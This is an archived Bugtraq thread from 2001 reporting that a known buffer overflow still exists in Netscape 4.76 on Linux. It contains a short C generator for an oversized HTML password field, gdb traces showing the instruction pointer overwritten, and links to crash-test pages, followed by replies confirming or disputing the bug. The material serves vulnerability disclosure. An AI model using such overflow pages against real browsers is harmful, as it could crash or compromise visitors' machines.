5964620 2001-01-16 00:19 -0500 /185 rader/ fish stiqz <fish@ANALOG.ORG>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-16 20:56 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: fish@ANALOG.ORG
Mottagare: Bugtraq (import) <14842>
Ärende: Buffer Overflow still exists in Netscape <= 4.76
------------------------------------------------------------
From: fish stiqz <fish@ANALOG.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010116001943.A24465@analog.org>
Hello.
I have noticed that the buffer overflow discovered by Michal Zalewski
and covered extensively by the different unix distributions is still
present in netscape 4.76 even though they claim it is not.
Refer to these links for background information:
http://security-archive.merton.ox.ac.uk/bugtraq-200011/0099.html
http://security-archive.merton.ox.ac.uk/bugtraq-200011/0426.html
http://www.redhat.com/support/errata/RHSA-2000-109.html
All of the above advisories (and all that I've seen) state that
netscape versions up to and including 4.75 are vulnerable, not 4.76.
I have caused netscape 4.76 on both redhat 6.2 and slackware-current
to segfault. Below is the proof of the pudding:
On slackware-current (netscape.tgz):
$ ./nutscrape 20000 > crash_me.html
$ netscape -v
Netscape 4.76/U.S., 06-Oct-00; (c) 1995-2000 Netscape Communications Corp.
$ gdb /usr/bin/netscape
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
(gdb) set args http://fish.analog.org/~fish/crash_me.html
(gdb) run
Starting program: /usr/bin/netscape
http://fish.analog.org/~fish/crash_me.html
warning: Unable to find dynamic linker breakpoint function.
GDB will be unable to debug shared library initializers
and track explicitly loaded dynamic code.
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info all-registers
eax 0x41414141 1094795585
ecx 0xbfffd904 -1073751804
edx 0x91c1c00 152837120
ebx 0x175a2c 1530412
esp 0xbfffd83c 0xbfffd83c
ebp 0xbfffd864 0xbfffd864
esi 0x0 0
edi 0x921eb8c 153217932
eip 0x41414141 0x41414141
eflags 0x10246 66118
<snip>
On Redhat 6.2 (netscape-communicator-4.76-0.6.2.i386.rpm):
$ cat /etc/redhat-release Red Hat Linux release 6.2 (Zoot) $
netscape -v Netscape 4.76/U.S., 06-Oct-00; (c) 1995-2000 Netscape
Communications Corp. $ rpm -qa |grep netscape
netscape-communicator-4.76-0.6.2 netscape-common-4.76-0.6.2 $ gdb
/usr/lib/netscape/netscape-communicator GNU gdb 19991004 Copyright
1998 Free Software Foundation, Inc. GDB is free software, covered
by the GNU General Public License, and you are welcome to change it
and/or distribute copies of it under certain conditions. Type "show
copying" to see the conditions. There is absolutely no warranty for
GDB. Type "show warranty" for details. This GDB was configured as
"i386-redhat-linux"... (no debugging symbols found)... (gdb) run
http://fish.analog.org/~fish/crash_me.html Starting program:
/usr/lib/netscape/netscape-communicator
http://fish.analog.org/~fish/crash_me.html
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()Cannot access memory at address 0x7f0000
(gdb) info all-registers
eax 0x41414141 1094795585
ecx 0xbfffdd14 -1073750764
edx 0x9268200 153518592
ebx 0x40064a2c 1074154028
esp 0xbfffdc4c -1073750964
ebp 0xbfffdc74 -1073750924
esi 0x0 0
edi 0x92624ec 153494764
eip 0x41414141 1094795585
eflags 0x10246 66118
<snip>
So we see here that out eip is now 0x41414141. This is obviously
bad. Windows versions seem to not be vulnerable, although I have
only tested this on versions 4.08 and 4.61.
If this vulnerability is exploited, an attacker could gain entrance
to potentially any computer running vulnerable versions of netscape
that visits his website. To test if you are vulnerable, point your
browser to http://fish.analog.org/~fish/crash_netscape.html (15,000
A's) or http://fish.analog.org/~fish/crash_netscape2.html (100,000
A's)
My Findings: (you may have to hit reload before the browser will
crash):
Number of A's | Result
-------------------------------------------------------
1000 Nothing.
2000 Nothing.
5000 Memory corruption (check view source and you may see this)
7000 Continued corruption.
10000 SIGSEGV in PR_HashTableRawLookup ()
15000 SIGSEGV in _MD_GetArchitecture ()
>= 20000 SIGSEGV in XFE_GetFormElementInfo ()
And, sometimes eip overwrite.
-------------------------------------------------------
nutscrape.c is a very trivial program that generates a big html form
value in an input field, which causes the overflow.
/*
* nutscrape.c - fish stiqz <fish@analog.org>
* Trivial overflow in netscape.
*/
#include <stdio.h>
#include <stdlib.h>
#define OVERFLOW_BYTE 0x41
void usage(char *p)
{
fprintf(stderr, "usage: %s <num of %c's>\n", p, OVERFLOW_BYTE);
exit(EXIT_FAILURE);
}
int main(int argc, char **argv)
{
int i, t;
if(argc != 2)
usage(argv[0]);
t = atoi(argv[1]);
printf("<html>\n\n<head>\n<title>Test of Netscape</title>\n"
"</head>\n\n<body>\n\n\n<form action=foo method=bar>\n"
"<input type=password value=");
for(i = 0; i < t; i++)
putc(OVERFLOW_BYTE, stdout);
printf(">\nmore form tags\n</form>\n\n\n</body>\n</html>\n");
return EXIT_SUCCESS;
}
So, in summary, If you upgraded to netscape 4.76 to fix the buffer
overflow problem, then you upgraded in vain, the problem most
definitely still exists.
Hope you all have a good day.
- fish stiqz
shoutouts to nerile.
#TelcoNinjas suck.
--
+---------------------------------------------------------------------------+
| fish stiqz <fish@analog.org> <*)))-< ** yum, yum, delicious ** |
+---------------------------------------------------------------------------+
(5964620) --------------------------------(Ombruten)
Kommentar i text 5965279 av Szilveszter Adam <sziszi@PETRA.HOS.U-SZEGED.HU>
Kommentar i text 5965320 av Frank v Waveren <fvw@VAR.CX>
5965279 2001-01-16 19:08 +0100 /23 rader/ Szilveszter Adam <sziszi@PETRA.HOS.U-SZEGED.HU>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-17 01:22 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: sziszi@PETRA.HOS.U-SZEGED.HU
Mottagare: Bugtraq (import) <14845>
Kommentar till text 5964620 av fish stiqz <fish@ANALOG.ORG>
Ärende: Re: Buffer Overflow still exists in Netscape <= 4.76
------------------------------------------------------------
From: Szilveszter Adam <sziszi@PETRA.HOS.U-SZEGED.HU>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010116190857.A21411@petra.hos.u-szeged.hu>
Hello everybody,
Crash was reproduced here also with Communicator for Linux ver 4.76.
Netscape 4.7 on Win95 did not crash. IE on WinME was not affected.
But some good news to users of non-MS platforms:
Mozilla as built from CVS today DID NOT crash on FreeBSD 5.0-CURRENT
with either page no matter how many times I reloaded. This may mean
also that NS 6 is not affected but this was not tested.
--
Regards:
Szilveszter ADAM
Szeged University
Szeged Hungary
(5965279) --------------------------------(Ombruten)
5965320 2001-01-16 18:54 +0100 /30 rader/ Frank v Waveren <fvw@VAR.CX>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-17 02:06 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: fvw@VAR.CX
Mottagare: Bugtraq (import) <14851>
Kommentar till text 5964620 av fish stiqz <fish@ANALOG.ORG>
Ärende: Re: Buffer Overflow still exists in Netscape <= 4.76
------------------------------------------------------------
From: Frank v Waveren <fvw@VAR.CX>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010116185410.A4044@var.cx>
On Tue, Jan 16, 2001 at 12:19:43AM -0500, fish stiqz wrote:
> All of the above advisories (and all that I've seen) state that netscape
> versions up to and including 4.75 are vulnerable, not 4.76. I have
> caused netscape 4.76 on both redhat 6.2 and slackware-current to segfault.
> Below is the proof of the pudding:
No dice, apart from a slight rendering bug if you go to the end of the
password field, it doesn't appear to have any problems here.
[/home/fvw] netscape -v
Netscape Lite 4.76/U.S., 06-Oct-00; (c) 1995-2000 Netscape Communications Corp.
[/home/fvw] rpm -qi netscape-navigator
Name : netscape-navigator Relocations: /usr
Version : 4.76 Vendor: Red Hat, Inc.
Release : 0.6.2 Build Date: Mon Nov 13 18:47:54 2000
Size : 7690589 License: Commercial
Packager : Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>
Summary : The Netscape Navigator Web browser.
--
Frank v Waveren Fingerprint: 0EDB 8787
fvw@[var.cx|dse.nl|stack.nl|chello.nl] ICQ#10074100 09B9 6EF5 6425 B855
Public key: http://www.var.cx/pubkey/fvw@var.cx-gpg 7179 3036 E136 B85D
(5965320) ------------------------------------------
Kommentar i text 5965210 av fish stiqz <fish@ANALOG.ORG>
5965210 2001-01-16 14:40 -0500 /117 rader/ fish stiqz <fish@ANALOG.ORG>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-17 00:31 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: fish@ANALOG.ORG
Mottagare: Bugtraq (import) <14843>
Kommentar till text 5965320 av Frank v Waveren <fvw@VAR.CX>
Sänt: 2001-01-17 02:06
Ärende: Re: Buffer Overflow still exists in Netscape <= 4.76
------------------------------------------------------------
From: fish stiqz <fish@ANALOG.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010116144003.A3027@analog.org>
Frank v Waveren <fvw@var.cx> wrote:
> No dice, apart from a slight rendering bug if you go to the end of the
> password field, it doesn't appear to have any problems here.
>
> [/home/fvw] netscape -v
> Netscape Lite 4.76/U.S., 06-Oct-00; (c) 1995-2000 Netscape Communications Corp.
> [/home/fvw] rpm -qi netscape-navigator
> Name : netscape-navigator Relocations: /usr
> Version : 4.76 Vendor: Red Hat, Inc.
> Release : 0.6.2 Build Date: Mon Nov 13 18:47:54 2000
> Size : 7690589 License: Commercial
> Packager : Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>
> Summary : The Netscape Navigator Web browser.
The dice is rolling over here. This is the exact rpm from the redhat
update ftp site. The md5sum matches the one listed on their website
(see below), and it crashes with the pages I listed on the original
post:
-> http://fish.analog.org/~fish/crash_netscape2.html
$ cat /etc/redhat-release Red Hat Linux release 6.2 (Zoot) $ md5sum
netscape-navigator-4.76-0.6.2.i386.rpm
670b08cbad1097f4ca923071c202b5dd
netscape-navigator-4.76-0.6.2.i386.rpm
- Same rpm listed at
http://www.redhat.com/support/errata/RHSA-2000-109.html:
670b08cbad1097f4ca923071c202b5dd
6.2/i386/netscape-navigator-4.76-0.6.2.i386.rpm
$ rpm -qi netscape-navigator
Name : netscape-navigator Relocations: /usr
Version : 4.76 Vendor: Red Hat, Inc.
Release : 0.6.2 Build Date: Mon 13 Nov 2000
12:47:54 PM EST
Install date: Tue 16 Jan 2001 01:45:38 PM EST Build Host:
porky.devel.redhat.com
Group : Applications/Internet Source RPM:
netscape-4.76-0.6.2.src.rpm
Size : 7690589 License: Commercial
Packager : Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>
Summary : The Netscape Navigator Web browser.
Description :
Netscape Navigator is the industry-leading Web browser. It supports
the latest HTML standards, Java, JavaScript and some style sheets.
Information on the Netscape Navigator license may be found in the file
/usr/doc/netscape-common-%{version}/LICENSE.
This will install the basic Netscape Navigator Web browser.
If you want additional features, such as the Usenet news reader and
HTML editor, you should install the netscape-communicator package.
- This is the same version you are using! It definitely crashes for
me, (see below).
$ rpm -qf /usr/lib/netscape/netscape-navigator
netscape-navigator-4.76-0.6.2
$ gdb /usr/lib/netscape/netscape-navigator GNU gdb 19991004 Copyright
1998 Free Software Foundation, Inc. GDB is free software, covered by
the GNU General Public License, and you are welcome to change it
and/or distribute copies of it under certain conditions. Type "show
copying" to see the conditions. There is absolutely no warranty for
GDB. Type "show warranty" for details. This GDB was configured as
"i386-redhat-linux"... (no debugging symbols found)... (gdb) set
args http://fish.analog.org/~fish/crash_netscape2.html (gdb) run
Starting program: /usr/lib/netscape/netscape-navigator
http://fish.analog.org/~fish/crash_netscape2.html
Program received signal SIGSEGV, Segmentation fault.
0x4002c4d3 in XtCallCallbackList () from /usr/X11R6/lib/libXt.so.6
(gdb) info all-registers
eax 0x40063bc4 1074150340
ecx 0x41414141 1094795585
edx 0x186a0 100000
ebx 0x40065a2c 1074158124
esp 0xbfffdab4 -1073751372
ebp 0xbfffdac8 -1073751352
esi 0xbfffdb90 -1073751152
edi 0x41414145 1094795589
eip 0x4002c4d3 1073923283
eflags 0x10202 66050
<snip>
I have also gotten this to crash on the latest debian-unstable.
$ dpkg --print-avail netscape
Package: netscape
Priority: optional
Section: contrib/web
Installed-Size: 22
Maintainer: Ryan Murray <rmurray@debian.org>
Architecture: i386
Source: netscape4.base
Version: 1:4.76-1
Depends: communicator | navigator
Exactly what did you do that it didn't segfault on you? In all my
tests Netscape has died either as soon as the page loads or as soon
as you try to go somewhere else (or reload).
--
+---------------------------------------------------------------------------+
| fish stiqz <fish@analog.org> <*)))-< ** yum, yum, delicious ** |
+---------------------------------------------------------------------------+
(5965210) --------------------------------(Ombruten)